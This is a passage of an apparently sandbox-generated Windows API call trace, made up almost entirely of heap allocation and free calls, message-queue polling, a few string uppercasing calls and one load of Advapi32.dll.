lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.486] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.487] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.487] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.487] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.487] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.488] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.488] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.489] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.490] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0262.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.491] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.491] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.491] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0262.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1848 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.492] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.492] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0262.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.493] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.493] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.493] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0262.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.494] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.496] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.496] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: 